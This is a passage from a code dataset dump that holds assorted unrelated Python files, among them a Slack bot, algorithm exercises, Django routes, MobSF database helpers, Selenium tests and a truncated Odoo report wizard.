matches.group(2).strip()) if matches else (None, None)\n\n\ndef handle_command(command, channel):\n \"\"\"\n Executes bot command if the command is known\n \"\"\"\n # Default response is help text for the user\n default_response = \"Not sure what you mean. Try *{}*.\".format(EXAMPLE_COMMAND)\n\n # Finds and executes the given command, filling in response\n response = None\n # This is where you start to implement more commands!\n if command.startswith(EXAMPLE_COMMAND):\n response = \"Sure...write some more code then I can do that!\"\n\n # Sends the response back to the channel\n slack_client.api_call(\n \"chat.postMessage\",\n channel=channel,\n text=response or default_response\n )\n\n\nif __name__ == \"__main__\":\n if slack_client.rtm_connect(with_team_state=False):\n print(\"Starter Bot connected and running!\")\n # Read bot's user ID by calling Web API method `auth.test`\n starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\n while True:\n command, channel = parse_bot_commands(slack_client.rtm_read())\n if command:\n handle_command(command, channel)\n time.sleep(RTM_READ_DELAY)\n else:\n print(\"Connection failed. Exception traceback printed above.\")\n","sub_path":"starterbot.py","file_name":"starterbot.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272367623","text":"import csv\nimport math\nimport time\n\n\n# pi - число pi, rad - радиус сферы (Земли)\nrad = 6372795\ninput_filename_effes = 'UA_poc_effes.csv'\ninput_filename_inbev = 'UA_pocs_SW.csv'\noutput_filename = 'pocs_matching_inbev-effes2.csv'\ndistance_limit = 100\nTIMEOUT = 0\n\n\ndef csv_read(filename):\n with open(filename, 'r', encoding=\"utf-8\") as fp:\n reader = csv.reader(fp, delimiter=',', quotechar=\"'\")\n data_read = [row for row in reader]\n return data_read\n\n\ndef dist(p1, p2):\n # координаты двух точек\n llat1 = float(p1[1])\n llong1 = float(p1[2])\n\n llat2 = float(p2[1])\n llong2 = float(p2[2])\n\n # в радианах\n lat1 = llat1 * math.pi / 180.\n lat2 = llat2 * math.pi / 180.\n long1 = llong1 * math.pi / 180.\n long2 = llong2 * math.pi / 180.\n\n # косинусы и синусы широт и разницы долгот\n cl1 = math.cos(lat1)\n cl2 = math.cos(lat2)\n sl1 = math.sin(lat1)\n sl2 = math.sin(lat2)\n delta = long2 - long1\n cdelta = math.cos(delta)\n sdelta = math.sin(delta)\n\n # вычисления длины большого круга\n y = math.sqrt(math.pow(cl2 * sdelta, 2) + math.pow(cl1 * sl2 - sl1 * cl2 * cdelta, 2))\n x = sl1 * sl2 + cl1 * cl2 * cdelta\n ad = math.atan2(y, x)\n dist = ad * rad\n return dist\n\n\ndef match(all_inbev, all_effes):\n result = []\n count = 0\n for effes in all_effes:\n\n for inbev in all_inbev:\n res = []\n try:\n distance = dist(inbev, effes)\n except ValueError:\n continue\n if distance > 0 and distance <= distance_limit:\n res.append(effes[0])\n res.append(inbev[0])\n res.append(distance)\n result.append(res)\n print('итерация - {} совпадений - {} расстояние - {}'.format(count, len(result), distance))\n\n time.sleep(TIMEOUT)\n\n count += 1\n return result\n\n\ndef write_file(text):\n with open(output_filename, \"w\", newline=\"\", encoding=\"utf-8\", ) as file:\n writer = csv.writer(file)\n # writer.writerows([['id', 'Ol_id_inbev','distance'], ])\n writer.writerows(text)\n return None\n\n\nall_inbev = csv_read(input_filename_inbev)[1:]\nall_effes = csv_read(input_filename_effes)[1:]\n# after_mach = match(all_inbev, all_effes)\nwrite_file(match(all_inbev, all_effes))\n","sub_path":"matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"209112051","text":"# -*- coding: utf_8 -*-\r\nimport logging\r\n\r\nimport settings\r\nfrom django.db.models import QuerySet\r\nfrom utils import python_dict, python_list\r\nfrom StaticAnalyzer.models import StaticAnalyzerAndroid\r\n\r\n\"\"\"Module holding the functions for the db.\"\"\"\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef get_context_from_db_entry(db_entry: QuerySet) -> dict:\r\n \"\"\"Return the context for APK/ZIP from DB.\"\"\"\r\n try:\r\n logger.info('Analysis is already Done. Fetching data from the DB...')\r\n context = {\r\n 'version': settings.MOBSF_VER,\r\n 'title': 'Static Analysis',\r\n 'file_name': db_entry[0].FILE_NAME,\r\n 'app_name': db_entry[0].APP_NAME,\r\n 'app_type': db_entry[0].APP_TYPE,\r\n 'size': db_entry[0].SIZE,\r\n 'md5': db_entry[0].MD5,\r\n 'sha1': db_entry[0].SHA1,\r\n 'sha256': db_entry[0].SHA256,\r\n 'package_name': db_entry[0].PACKAGE_NAME,\r\n 'main_activity': db_entry[0].MAIN_ACTIVITY,\r\n 'exported_activities': db_entry[0].EXPORTED_ACTIVITIES,\r\n 'browsable_activities': python_dict(db_entry[0].BROWSABLE_ACTIVITIES),\r\n 'activities': python_list(db_entry[0].ACTIVITIES),\r\n 'receivers': python_list(db_entry[0].RECEIVERS),\r\n 'providers': python_list(db_entry[0].PROVIDERS),\r\n 'services': python_list(db_entry[0].SERVICES),\r\n 'libraries': python_list(db_entry[0].LIBRARIES),\r\n 'target_sdk': db_entry[0].TARGET_SDK,\r\n 'max_sdk': db_entry[0].MAX_SDK,\r\n 'min_sdk': db_entry[0].MIN_SDK,\r\n 'version_name': db_entry[0].VERSION_NAME,\r\n 'version_code': db_entry[0].VERSION_CODE,\r\n 'icon_hidden': db_entry[0].ICON_HIDDEN,\r\n 'icon_found': db_entry[0].ICON_FOUND,\r\n 'permissions': python_dict(db_entry[0].PERMISSIONS),\r\n 'certificate_analysis': python_dict(db_entry[0].CERTIFICATE_ANALYSIS),\r\n 'manifest_analysis': python_list(db_entry[0].MANIFEST_ANALYSIS),\r\n 'network_security': python_list(db_entry[0].NETWORK_SECURITY),\r\n 'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS),\r\n 'file_analysis': python_list(db_entry[0].FILE_ANALYSIS),\r\n 'android_api': python_dict(db_entry[0].ANDROID_API),\r\n 'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS),\r\n 'niap_analysis': python_dict(db_entry[0].NIAP_ANALYSIS),\r\n 'urls': python_list(db_entry[0].URLS),\r\n 'domains': python_dict(db_entry[0].DOMAINS),\r\n 'emails': python_list(db_entry[0].EMAILS),\r\n 'strings': python_list(db_entry[0].STRINGS),\r\n 'firebase_urls': python_list(db_entry[0].FIREBASE_URLS),\r\n 'files': python_list(db_entry[0].FILES),\r\n 'exported_count': python_dict(db_entry[0].EXPORTED_COUNT),\r\n 'apkid': python_dict(db_entry[0].APKID),\r\n 'trackers': python_dict(db_entry[0].TRACKERS),\r\n 'secrets': python_list(db_entry[0].SECRETS),\r\n }\r\n return context\r\n except Exception:\r\n logger.exception('Fetching from DB')\r\n\r\n\r\ndef get_context_from_analysis(app_dic,\r\n man_data_dic,\r\n man_an_dic,\r\n code_an_dic,\r\n cert_dic,\r\n bin_anal,\r\n apk_id,\r\n trackers) -> dict:\r\n \"\"\"Get the context for APK/ZIP from analysis results.\"\"\"\r\n try:\r\n context = {\r\n 'title': 'Static Analysis',\r\n 'version': settings.MOBSF_VER,\r\n 'file_name': app_dic['app_name'],\r\n 'app_name': app_dic['real_name'],\r\n 'app_type': app_dic['zipped'],\r\n 'size': app_dic['size'],\r\n 'md5': app_dic['md5'],\r\n 'sha1': app_dic['sha1'],\r\n 'sha256': app_dic['sha256'],\r\n 'package_name': man_data_dic['packagename'],\r\n 'main_activity': man_data_dic['mainactivity'],\r\n 'exported_activities': man_an_dic['exported_act'],\r\n 'browsable_activities': python_dict(man_an_dic['browsable_activities']),\r\n 'activities': python_list(man_data_dic['activities']),\r\n 'receivers': python_list(man_data_dic['receivers']),\r\n 'providers': python_list(man_data_dic['providers']),\r\n 'services': python_list(man_data_dic['services']),\r\n 'libraries': python_list(man_data_dic['libraries']),\r\n 'target_sdk': man_data_dic['target_sdk'],\r\n 'max_sdk': man_data_dic['max_sdk'],\r\n 'min_sdk': man_data_dic['min_sdk'],\r\n 'version_name': man_data_dic['androvername'],\r\n 'version_code': man_data_dic['androver'],\r\n 'icon_hidden': app_dic['icon_hidden'],\r\n 'icon_found': app_dic['icon_found'],\r\n 'permissions': python_dict(man_an_dic['permissons']),\r\n 'certificate_analysis': python_dict(cert_dic),\r\n 'manifest_analysis': python_list(man_an_dic['manifest_anal']),\r\n 'network_security': python_list(man_an_dic['network_security']),\r\n 'binary_analysis': python_list(bin_anal),\r\n 'file_analysis': python_list(app_dic['certz']),\r\n 'android_api': python_dict(code_an_dic['api']),\r\n 'code_analysis': python_dict(code_an_dic['findings']),\r\n 'niap_analysis': python_dict(code_an_dic['niap']),\r\n 'urls': python_list(code_an_dic['urls']),\r\n 'domains': python_dict(code_an_dic['domains']),\r\n 'emails': python_list(code_an_dic['emails']),\r\n 'strings': python_list(app_dic['strings']),\r\n 'firebase_urls': python_list(code_an_dic['firebase']),\r\n 'files': python_list(app_dic['files']),\r\n 'exported_count': python_dict(man_an_dic['exported_cnt']),\r\n 'apkid': python_dict(apk_id),\r\n 'trackers': python_dict(trackers),\r\n 'secrets': python_list(app_dic['secrets']),\r\n }\r\n return context\r\n except Exception:\r\n logger.exception('Rendering to Template')\r\n\r\n\r\ndef save_or_update(update_type,\r\n app_dic,\r\n man_data_dic,\r\n man_an_dic,\r\n code_an_dic,\r\n cert_dic,\r\n bin_anal,\r\n apk_id,\r\n trackers) -> None:\r\n \"\"\"Save/Update an APK/ZIP DB entry.\"\"\"\r\n try:\r\n values = {\r\n 'FILE_NAME': app_dic['app_name'],\r\n 'APP_NAME': app_dic['real_name'],\r\n 'APP_TYPE': app_dic['zipped'],\r\n 'SIZE': app_dic['size'],\r\n 'MD5': app_dic['md5'],\r\n 'SHA1': app_dic['sha1'],\r\n 'SHA256': app_dic['sha256'],\r\n 'PACKAGE_NAME': man_data_dic['packagename'],\r\n 'MAIN_ACTIVITY': man_data_dic['mainactivity'],\r\n 'EXPORTED_ACTIVITIES': man_an_dic['exported_act'],\r\n 'BROWSABLE_ACTIVITIES': man_an_dic['browsable_activities'],\r\n 'ACTIVITIES': man_data_dic['activities'],\r\n 'RECEIVERS': man_data_dic['receivers'],\r\n 'PROVIDERS': man_data_dic['providers'],\r\n 'SERVICES': man_data_dic['services'],\r\n 'LIBRARIES': man_data_dic['libraries'],\r\n 'TARGET_SDK': man_data_dic['target_sdk'],\r\n 'MAX_SDK': man_data_dic['max_sdk'],\r\n 'MIN_SDK': man_data_dic['min_sdk'],\r\n 'VERSION_NAME': man_data_dic['androvername'],\r\n 'VERSION_CODE': man_data_dic['androver'],\r\n 'ICON_HIDDEN': app_dic['icon_hidden'],\r\n 'ICON_FOUND': app_dic['icon_found'],\r\n 'CERTIFICATE_ANALYSIS': cert_dic,\r\n 'PERMISSIONS': man_an_dic['permissons'],\r\n 'MANIFEST_ANALYSIS': man_an_dic['manifest_anal'],\r\n 'BINARY_ANALYSIS': bin_anal,\r\n 'FILE_ANALYSIS': app_dic['certz'],\r\n 'ANDROID_API': code_an_dic['api'],\r\n 'CODE_ANALYSIS': code_an_dic['findings'],\r\n 'NIAP_ANALYSIS': code_an_dic['niap'],\r\n 'URLS': code_an_dic['urls'],\r\n 'DOMAINS': code_an_dic['domains'],\r\n 'EMAILS': code_an_dic['emails'],\r\n 'STRINGS': app_dic['strings'],\r\n 'FIREBASE_URLS': code_an_dic['firebase'],\r\n 'FILES': app_dic['files'],\r\n 'EXPORTED_COUNT': man_an_dic['exported_cnt'],\r\n 'APKID': apk_id,\r\n 'TRACKERS': trackers,\r\n 'NETWORK_SECURITY': man_an_dic['network_security'],\r\n 'SECRETS': app_dic['secrets'],\r\n }\r\n if update_type == 'save':\r\n db_entry = StaticAnalyzerAndroid.objects.filter(\r\n MD5=app_dic['md5'])\r\n if not db_entry.exists():\r\n StaticAnalyzerAndroid.objects.create(**values)\r\n else:\r\n StaticAnalyzerAndroid.objects.filter(\r\n MD5=app_dic['md5']).update(**values)\r\n except Exception:\r\n logger.exception('Updating DB')\r\n","sub_path":"StaticAnalyzer/db_interaction.py","file_name":"db_interaction.py","file_ext":"py","file_size_in_byte":10020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23011095","text":"import argparse\nimport gzip\n\nparser = argparse.ArgumentParser(description=\"\"\"Reads and prints a text file\"\"\")\nparser.add_argument(\"filename\", type=str, help=\"The file name\")\nparser.add_argument(\"-z\", \"--gzipped\", action=\"store_true\", help=\"If set, input file is assumed gzipped\")\n\nargs = parser.parse_args()\ninputFile = args.filename\nfh = \"\"\nif(args.gzipped):\n fh = gzip.open(inputFile, \"rt\")\nelse:\n fh = open(inputFile, \"r\")\n\nfor line in fh:\n line = line.strip(\"\\n\")\n print(line)\n\nfh.close()\n","sub_path":"exercises/readFile_gz.py","file_name":"readFile_gz.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"475393038","text":"\"\"\"Дополнительные задания\"\"\"\nfrom multiprocessing import Queue\nfrom Matrix import Matrix\nfrom random import randint\nfrom multiprocessing import Process\nfrom time import sleep\n\n\ndef creating(q):\n while True:\n size = randint(2, 7)\n a = Matrix(a=size, b=size, random=True)\n b = Matrix(a=size, b=size, random=True)\n print(f\"Сгенерированы матрицы:\\n{a}\\n{b}\\n--------------------------\")\n q.put([a, b])\n sleep(8) # Эта функция выполняется намного быстрее умножения, поэтому ждём\n\n\ndef reading(q):\n while True:\n Matrix = q.get()\n MultMatrix = Matrix[0] * Matrix[1]\n print(\n f\"Умножены матрицы: {Matrix[0]} и {Matrix[1]},\\nРезультат: {MultMatrix}\\n-------------------------------\")\n\n\nif __name__ == \"__main__\":\n q = Queue()\n creating_proc = Process(target=creating, args=[q])\n mult_proc = Process(target=reading, args=[q])\n creating_proc.start()\n mult_proc.start()\n","sub_path":"additional_tasks.py","file_name":"additional_tasks.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"21697315","text":"# -- coding = 'utf-8' -- \n# Author Kylin\n# Python Version 3.7.3\n# OS macOS\n\"\"\"\nNo.1100 长度为K的无重复字符子串\n需求:\n 给你一个字符串S,找出所有长度为K且不含重复字符的子串,请你返回全部满足要求的子串的数目。\n注意:\n S中的所有字符均为小写英文字母\n\"\"\"\n\n\ndef numKLenSubstrNoRepeats(s, k):\n \"\"\"\n 滑动窗口\n 时间复杂度:O(n),n为s的长度\n 空间复杂度:O(|s|),s的字符集个数,用于记录字符出现情况\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n n = len(s)\n count = 0\n window = dict()\n left, right = 0, 0\n\n while right < n:\n # 加入当前元素\n ch = s[right]\n if ch in window:\n window[ch] += 1\n else:\n window[ch] = 1\n\n # 到达窗口长度\n if right - left + 1 == k:\n if len(window) == k:\n # 如果元素均不相同,则记录\n count += 1\n # 缩小窗口\n left_ch = s[left]\n window[left_ch] -= 1\n if window[left_ch] == 0:\n del window[left_ch]\n left += 1\n right += 1\n\n return count\n\n\nif __name__ == \"__main__\":\n S = \"havefunonleetcode\"\n K = 5\n count = numKLenSubstrNoRepeats(S, K)\n print(count)","sub_path":"LeetCode/src/search07/num_Klen_substring.py","file_name":"num_Klen_substring.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157451105","text":"def insertion(N, M, j, i):\n\tprint(N,M,j,i)\n\tmask = -1 << j\n\tmask = ~mask\n\tmask >>= i\n\tmask = ~mask\n\tM <<= i\n\tN &= mask\n\tN |= M\n\treturn N\n\t\n\n\ndef runTests():\n\tN = int('10000000000', 2)\n\tM = int('10011', 2)\n\ti, j = 2,6\n\tprint(insertion(N,M,j,i) == int('10001001100', 2))\n\nrunTests()","sub_path":"CTCI/Chapter_5/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535295405","text":"from collections import namedtuple\n\n\nPins = namedtuple('Pins', ['sr', 'sg', 'f', 'b', 'l', 'r'])\n\n\nclass Translator:\n def __init__(self, output):\n self.pins = Pins(*output.setup(*Pins._fields))\n\n self._status_outputs = {\n 'activity': ('pulse', (1, self.pins.sg)),\n 'ready': ('on', (self.pins.sr,)),\n 'startup': ('flash', (self.pins.sr,)),\n 'error': ('flash', (self.pins.sr, self.pins.sg))\n }\n\n def do(self, action):\n if action.type == 'status':\n return self._status_outputs[action.status]\n elif action.type == 'go':\n return 'on', (self._pinfor(action.direction),)\n elif action.type == 'stop':\n return 'off', (self._pinfor(action.direction),)\n elif action.type == 'halt':\n return 'halt', action.level\n\n def _pinfor(self, direction):\n if direction == 'forward':\n return self.pins.f\n elif direction == 'backward':\n return self.pins.b\n elif direction == 'turn_left':\n return self.pins.l\n elif direction == 'turn_right':\n return self.pins.r\n\n\ntranslator_class = Translator\n","sub_path":"controller/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242359913","text":"# Download the Python helper library from twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\n# To set up environmental variables, see http://twil.io/secure\naccount = os.environ['TWILIO_ACCOUNT_SID']\ntoken = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account, token)\n\nuser = client.chat \\\n .services(\"ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .users(\"USXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .fetch()\n\nprint(user.identity)\n","sub_path":"ip-messaging/rest/users/retrieve-user/retrieve-user.6.x.py","file_name":"retrieve-user.6.x.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363192469","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .views import *\n\napp_name = 'dashboard'\n\nurlpatterns = [\n path('', index, name='index'),\n\n path('add/category/', add_category, name='add_category'),\n path('edit/category//', edit_category, name='edit_category'),\n path('delete/category//', delete_category, name=\"delete_category\"),\n\n path('add/sub/category/', add_sub_category, name='add_sub_category'),\n path('edit/sub/category//',\n edit_sub_category, name='edit_sub_category'),\n path('delete/sub/category//',\n delete_sub_category, name=\"delete_sub_category\"),\n\n path('products/', products, name='products'),\n path('edit/products//', edit_product, name='edit_product'),\n path('delete/product//', delete_product, name='delete_product'),\n\n\n path('banner/', banner, name='banner'),\n path('edit/banner//', edit_banner, name='edit_banner'),\n path('delete/banner//', delete_banner, name='delete_banner'),\n\n path('blogs/', blogs, name='blogs'),\n path('edit/blog//', edit_blog, name='edit_blog'),\n path('delete/blog//', delete_blog, name='delete_blog'),\n\n path('brands/', brands, name='brands'),\n path('delete/brands//', delete_brands, name='delete_brands'),\n\n path('orders/', orders, name='orders'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391942301","text":"from ressources.vide import vide\nfrom ressources.board import boardCoord, pieceBlanc, pieceNoir\nfrom ressources.boardlimit import boardlimit\n\n\ndef tour(boardCoord, ligne, colonne, couleur):\n legalmoves = []\n if couleur == \"n\":\n color = pieceBlanc\n else:\n color = pieceNoir\n postour = [ligne, colonne]\n deplacement = [[1, 0], [0, 1], [-1, 0], [0, -1]]\n for possibilite in deplacement:\n i = 1\n while True:\n row = postour[0] + i * possibilite[0]\n column = postour[1] + i * possibilite[1]\n if boardlimit(row, column) and vide(boardCoord, row, column):\n legalmoves.append([row, column])\n i += 1\n else:\n if boardlimit(row, column) and boardCoord[row][column] in color:\n legalmoves.append([row, column])\n break\n return legalmoves\n","sub_path":"pieces/tour.py","file_name":"tour.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414718291","text":"# Decode Ways\n\n# A message containing letters from A-Z is being encoded to numbers using the following mapping:\n# \n# 'A' -> 1\n# 'B' -> 2\n# ...\n# 'Z' -> 26\n# Given an encoded message containing digits, determine the total number of ways to decode it.\n# \n# For example,\n# Given encoded message \"12\", it could be decoded as \"AB\" (1 2) or \"L\" (12).\n# \n# The number of ways decoding \"12\" is 2\n\n\n# Solution:\n# It's a recursively defined problem.\n# Decode(s) = IsValid(s[0]) * Decode(s[1:]) + IsValid(s[:2]) * Decode(s[2:])\n# Just be aware of all those special cases. The input could be invalid, therefore should output 0. \n\n# Test Cases:\n# s = Solution()\n# print(5 == s.numDecodings('1223'))\n# print(1 == s.numDecodings('10'))\n# print(0 == s.numDecodings('100'))\n# print(2 == s.numDecodings('12'))\n# print(0 == s.numDecodings('909'))\n\nclass Solution:\n # @param {string} s\n # @return {integer}\n def numDecodings(self, s):\n def is_valid(num):\n # Bug: Simply check int(num) in this funciton will miss bad case like '09'\n if len(num) == 1:\n return 1 if int(num) > 0 else 0 # Bug: input could be '0', which is invalid\n if len(num) == 2:\n return 1 if int(num) > 9 and int(num) < 27 else 0 \n # Bug: Need to handle empty input\n if s == '':\n return 0\n result = [0 for _ in range(len(s)+1)]\n result[-1] = 1 # Bug: Need to set this placeholde to 1\n if s[-1] != '0':\n result[-2] = 1\n for i in reversed(range(len(s)-1)): \n result[i] = is_valid(s[i]) * result[i+1] + is_valid(s[i:i+2])* result[i+2]\n return result[0]\n \n","sub_path":"091_DecodeWays/decode_ways.py","file_name":"decode_ways.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"298079269","text":"# 배열, 최대 최소\n# N개의 정수가 주어진다. 이때, 최솟값과 최댓값을 구하는 프로그램을 작성하시오.\n# 첫째 줄에 정수의 개수 N (1 ≤ N ≤ 1,000,000)이 주어진다. 둘째 줄에는 N개의 정수를 공백으로 구분해서 주어진다. \n# 모든 정수는 -1,000,000보다 크거나 같고, 1,000,000보다 작거나 같은 정수이다.\n# 첫째 줄에 주어진 정수 N개의 최솟값과 최댓값을 공백으로 구분해 출력한다.\n# 입력\n# 5 \n# 20 10 35 30 7\n\n# 출력\n# 7 35\n\n\nn = int(input())\nn_list = list(map(int, input().split()))\n\nif len(n_list) > n:\n print(\"error\")\nelse:\n print(min(n_list),max(n_list))\n\n\n","sub_path":"arr/test_10818_arr.py","file_name":"test_10818_arr.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"504386678","text":"import pyodbc\ndef Select2(conexion):\n print(\"mostrando datos2\")\n cur=conexion.cursor()\n cur.execute(\"select * from dimusers\")\n result= cur.fetchmany(3)\n print(result)\n \ndef Select(conexion):\n print(\"mostrando datos\")\n cur=conexion.cursor()\n cur.execute(\"select * from dimusers\")\n for fila in cur:\n print(fila)\n \ndef Insert(conexion):\n print(\"insert\")\n cur=conexion.cursor()\n cur.execute(\"insert into dimusers values ('BTO\\\\Alberto')\")\n cur.commit()\n Select(conexion)\n \ndef Update(conexion):\n print(\"actulizando\")\n cur=conexion.cursor()\n cur.execute(\"update dimusers set account = 'BTO\\\\Anibal' where accountid = 1007\")\n cur.commit()\n Select(conexion)\n \ndef Delete(CONEXION):\n print(\"borrando\")\n cur=CONEXION.cursor()\n cur.execute(\"delete from dimusers where accountid = 1007\") \n cur.commit()\n Select(CONEXION) \n \ncn = pyodbc.connect(\n \"Driver={SQL Server Native Client 11.0};\"\n \"Server=.;\"\n \"Database=DataMart__Security;\"\n \"Trusted_Connection=Yes;\" \n )\n\nif cn:\n print(\"conecto!\")\n \n \nSelect2(cn)\n#Insert(cn)\n#Update(cn)\n#Delete(cn)\n\ncn.close()","sub_path":"consql.py","file_name":"consql.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610874443","text":"import unittest\nimport os\nfrom selenium import webdriver\n\n\nclass TestOpenDashboard(unittest.TestCase):\n URL = 'http://localhost:5000/'\n\n def setUp(self):\n driver = '/usr/local/bin/chromedriver'\n os.environ['webdriver.chrome.driver'] = driver\n self.browser = webdriver.Chrome(driver)\n self.urlname = 'GDG-BH'\n\n def tearDown(self):\n self.browser.close()\n\n def test_should_loads_page(self):\n self.browser.get(self.URL)\n title = self.browser.title\n assert 'Community Dashboard' in title\n\n def test_should_loads_group_name_as_url_on_dashboard(self):\n self.browser.get(self.URL)\n urlname_field = self.browser.find_element_by_id('urlname')\n urlname_field.send_keys(self.urlname)\n\n go_button = self.browser.find_element_by_id('go')\n go_button.click()\n assert 'http://localhost:5000/dashboard/?urlname=' + self.urlname in self.browser.current_url\n\n def test_should_loads_groupname_on_dashboard(self):\n self.browser.get(self.URL)\n urlname_field = self.browser.find_element_by_id('urlname')\n urlname_field.send_keys(self.urlname)\n\n go_button = self.browser.find_element_by_id('go')\n go_button.click()\n\n community_name = self.browser.find_element_by_id('community-name')\n assert self.urlname in community_name.text\n\n def test_should_return_page_not_found_when_try_access_nonexistent_page(self):\n self.browser.get(self.URL + 'nonexistent')\n page_not_found = self.browser.find_element_by_tag_name('h1')\n assert 'Page Not Found' in page_not_found.text\n\nif __name__ == '__main__':\n unittest.main(verbosity=1)\n","sub_path":"tests/functional/test_dashboard.py","file_name":"test_dashboard.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463966443","text":"import time\n\ndef function():\n print(\"To make a function, use use 'def' to begin to define the function\")\n\nstring = \"this is a string\"\nthisIsAnInteger = 7\nthisIsABoolean = True\nthisIsAList = [5, 6, 7, 8]\nthisIsADictionary = {\"key\":\"value\" , \"five\":5}\n\nfunction()\nprint(\"This shows the value associated with the key in the dictionary: \" + thisIsADictionary[\"key\"])\nprint(\"This shows the value in the 2 spot of the list: \", thisIsAList[2])\n\nclass person():\n\n def __init__(self, height, weight, gender, ethnicity):\n self.height = height\n self.weight = weight\n personGender = gender\n personEthnicity = ethnicity\n print(\"Person: I am \" + personEthnicity + \"!\")\n\n def personSpeak(self):\n print(\"Mia: I weigh \" + self.weight + \"!\")\n\nMia = person(\"4'11\",\"108 lbs\", \"female\", \"Mixed\")\n\nprint(\"This is Mia's height: \" + Mia.height)\nprint(\"This is Mia's weight: \" + Mia.weight)\nMia.personSpeak()\n\nplayer = person(input(\"What's your height?: \"),input(\"What's your weight?: \"),input(\"What's your gender?: \"),input(\"What's your ethnicity?: \"))\n\nprint(\"This will not work because you can't access this varable without the 'self' at the beginning.\")\nprint(Mia.personGender)","sub_path":"Hello_Darkness.py","file_name":"Hello_Darkness.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158755567","text":"# coding: utf-8\nfrom odoo import api, fields, models\nfrom odoo.exceptions import ValidationError\nimport xlwt\nfrom io import BytesIO\nimport base64\nfrom datetime import datetime\n\nclass BimResourceReportWizard(models.TransientModel):\n _name = 'bim.resource.report.wizard'\n _description = 'Reporte de Recursos del Presupuesto'\n\n def _default_budget(self):\n return self.env['bim.budget'].browse(self._context.get('active_id'))\n\n\n material = fields.Boolean(string=\"Materiales\",default=True)\n equipment = fields.Boolean(string=\"Equipos\",default=True)\n labor = fields.Boolean(string=\"Mano de Obra\",default=True)\n aux = fields.Boolean(string=\"Otros\",default=True)\n budget_id = fields.Many2one('bim.budget', \"Presupuesto\", required=True, default=_default_budget)\n resource_all = fields.Boolean(default=True,string=\"TODOS\")\n filter_categ = fields.Boolean(string=\"Filtro Categoría\")\n category_id = fields.Many2one('product.category', \"Categoría\")\n\n def recursive_amount(self, resource, parent, amount=None):\n amount = amount is None and resource.balance or amount\n if parent.type == 'departure':\n amount_partial = amount * parent.quantity\n return self.recursive_amount(resource,parent.parent_id,amount_partial)\n else:\n return amount * parent.quantity\n\n def recursive_quantity(self, resource, parent, qty=None):\n qty = qty is None and resource.quantity or qty\n if parent.type == 'departure':\n qty_partial = qty * parent.quantity\n return self.recursive_quantity(resource,parent.parent_id,qty_partial)\n else:\n return qty * parent.quantity\n\n @api.model\n def get_total_aux(self,resource):\n total = 0\n if resource.balance > 0:\n total += self.recursive_amount(resource,resource.parent_id,None)\n return total\n\n @api.model\n def get_total(self,resource_id):\n budget = self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total = 0\n\n for rec in records:\n if rec.balance > 0:\n total += self.recursive_amount(rec,rec.parent_id,None)\n return total\n\n @api.model\n def get_quantity_aux(self,resource):\n total_qty = 0\n if resource.quantity > 0:\n total_qty += self.recursive_quantity(resource,resource.parent_id,None)\n return total_qty\n\n @api.model\n def get_quantity(self,resource_id):\n budget = self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total_qty = 0\n for rec in records:\n if rec.quantity > 0:\n total_qty += self.recursive_quantity(rec,rec.parent_id,None)\n return total_qty\n\n @api.model\n def get_weight(self,resource_id):\n budget = self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total_weight = 0\n for rec in records:\n total_weight += rec.weight\n return total_weight\n\n @api.model\n def get_function(self,aux):\n values = self.budget_id.concept_ids\n resources = False\n if aux:\n resources = values.filtered(lambda 